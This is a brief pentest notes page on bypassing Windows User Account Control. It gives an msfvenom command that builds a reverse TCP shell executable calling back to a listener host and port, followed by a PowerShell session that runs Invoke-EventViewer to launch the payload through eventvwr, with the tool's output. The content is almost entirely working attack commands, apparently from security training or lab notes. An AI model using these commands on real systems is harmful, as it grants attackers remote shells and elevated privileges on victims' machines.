Bypass UAC

generate a shell with msfvenom and execute it with EventViewer

msfvenom -p windows/shell_reverse_tcp lhost=192.168.119.168 lport=7777 -f exe > shell2.exe
PS C:\Windows\Tasks> Import-Module .\Invoke-EventViewer.ps1

PS C:\Windows\Tasks> Invoke-EventViewer 
[-] Usage: Invoke-EventViewer commandhere
Example: Invoke-EventViewer shell.exe

PS C:\Windows\Tasks> Invoke-EventViewer shell.exe
[+] Running
[1] Crafting Payload
[2] Writing Payload
[+] EventViewer Folder exists
[3] Finally, invoking eventvwr

Last updated